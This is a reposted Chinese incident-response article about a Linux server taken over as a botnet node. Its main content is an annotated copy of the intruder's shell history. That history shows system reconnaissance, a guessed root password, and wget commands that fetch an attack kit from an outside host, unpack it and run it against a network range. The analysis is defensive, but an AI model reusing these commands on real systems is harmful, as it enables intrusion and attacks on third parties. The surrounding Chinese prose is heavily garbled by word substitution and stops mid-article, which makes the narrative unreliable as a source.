加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

一次服务器沦陷为肉鸡后的实战排查过程!

发布时间:2019-06-12 03:45:50 所属栏目:业界 来源:民工哥技术之路
导读:1、从防火墙瘫痪提及 本日还没到公司就被电话奉告办公室无法正常毗连互联网了,网速很是慢,无法正常赏识网页。急匆慌忙感想公司,开始查找题目。 起首解除了互换机妨碍,由于内部局域网正常。当ping防火墙装备时,丢包严峻。很明明,防火墙出了题目,撑不

下面看看黑客用oracle账户都做了什么。起首复制一份oracle的呼吁汗青,防备后续操纵丢失该记录。

  1. cp /home/oracle/.bash_history hacker_history 

然后查察说明这个文件。 我在后头备注了黑客的设法。

  1. vi .bash_profile 
  2. vi .bash_profile (查察.bash_profile,看变量配置,把/home/oracle/bin增进到PATH) 
  3. ll 
  4. cd / 
  5. vi .bash_profile 
  6. vi .bash_profile (执行,配置情形变量) 
  8. ps x (查察体系运行历程) 
  9. free -m (查察内存巨细) 
  10. uname -a (查察体系版本) 
  11. cat /etc/issue (查察体系刊行版) 
  12. cat /etc/hosts (查察是否有网内呆板) 
  13. cat /proc/cpuinfo (查察CPU型号) 
  14. cat .bash_history (查察oracle账户汗青操纵) 
  15. w (查察体系负载) 
  16. ls -a (查察/home/oracle/下的潜匿文件) 
  17. passwd (修改掉oracle账户的暗码) 
  18. exit  
  19. ls  
  20. oracle 
  21. sqlplus (运行sqlplus) 
  22. su (试图切换到root账户) 
  23. app1123456 (揣摩root暗码) 
  24. ls  
  25. su - 
  27. free -m 
  28. php -v (查察php版本) 
  29. exit 
  31. free -m 
  32. php -v 
  33. ps aux 
  34. ls -a 
  35. exit 
  37. free -m 
  38. php -v 
  39. cat bash_his (查察汗青呼吁) 
  40. cat bash_history 
  41. cat .bash_history 
  42. wget scriptcoders.ucoz.com/piata.tgz (下载肉鸡进攻软件包) 
  43. tar zxvf piata.tgz (解压软件包) 
  44. rm -rf piata.tgz (删除软件包) 
  45. cd piata/ (切换到进攻软件目次) 
  46. ls -a 
  47. chmod +x * 
  48. ./a 210.212 (运行进攻软件) 
  49. screen (试图运行screen呼吁,发明没有后下载它) 
  50. ls -a 
  51. wget scriptcoders.ucoz.com/screen.tgz 
  52. tar zxvf screen.tgz (解压) 
  53. ./screen 
  54. exit 
  56. ps x 
  57. cd piata/ (切换到进攻软件目次) 
  58. ls -a 
  59. cat vuln.txt (查察进攻功效) 
  60. ls -a 
  61. mv vuln.txt 1.txt (生涯进攻功效) 
  62. ./screen -r 
  63. nano 1.txt (查察功效文件) 
  65. ps x 
  66. exit 
  67. cd piata 
  68. ps x 
  69. ls -a 
  70. nano 2.txt 
  71. exit 
  73. ps x 
  74. cd piata/ 
  75. ls -a 
  76. cat  
  77. mv vuln.txt 2.txt (生涯功效) 
  78. nano 2.txt 
  80. ps x 
  81. cd piata/ 
  82. ls- a 
  83. cat vuln.txt  
  84. rm -rf vuln.txt  
  85. ./screen -r 
  86. exit 
  88. ps x 
  89. cd piata/ 
  90. ls -a 
  91. cat vuln.txt  
  92. ls -a 
  93. mv vuln.txt 3.txt (生涯功效) 
  94. nano 3.txt  
  95. exit 
  97. ps x 
  98. cd piata/ 
  99. ls -a 
  100. cat vuln.txt  
  101. rm -rf vuln.txt  
  102. exit 
  104. ps x 
  105. cd piata/ 
  106. ls -a 
  107. cat vuln.txt  
  108. rm -rf vuln.txt  
  109. rm -rf 1.txt  
  110. rm -rf 2.txt 
  111. rm -rf 2.txt.save  
  112. rm -rf 3.txt  
  113. screen -r 
  114. ./screen -r 
  115. exit 
  117. ps x 
  118. cd piata/ 
  119. ls -a 
  120. cat vuln.txt  
  121. ls -a 
  122. nano vuln.txt  
  123. rm -rf vuln.txt  
  124. screen -r 
  125. ./screen -r 
  126. exit 
  128. ps x 
  129. cd piata/ 
  130. ls -a 
  131. cat vuln.txt  
  132. nano vuln.txt  
  134. ls -a 
  135. rm -rf vuln.txt  
  136. screen -r 
  137. ./screen -r 
  138. exit 
  140. ps x 
  141. cd piata/ 
  142. ls -a 
  143. cat vuln.txt  
  144. rm -rf vuln.txt  
  145. ps x 
  146. ls -a 
  147. ./screen -r 
  148. exit 
  150. ps x 
  151. cd piata/ 
  152. ls -a 
  153. cat vuln.txt  
  154. nano vuln.txt  
  156. rm -rf vuln.txt  
  157. ./screen -r 
  158. exit 

3.3 进攻器材一览

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.hunanwang.cn/ All Rights Reserved. 湖南网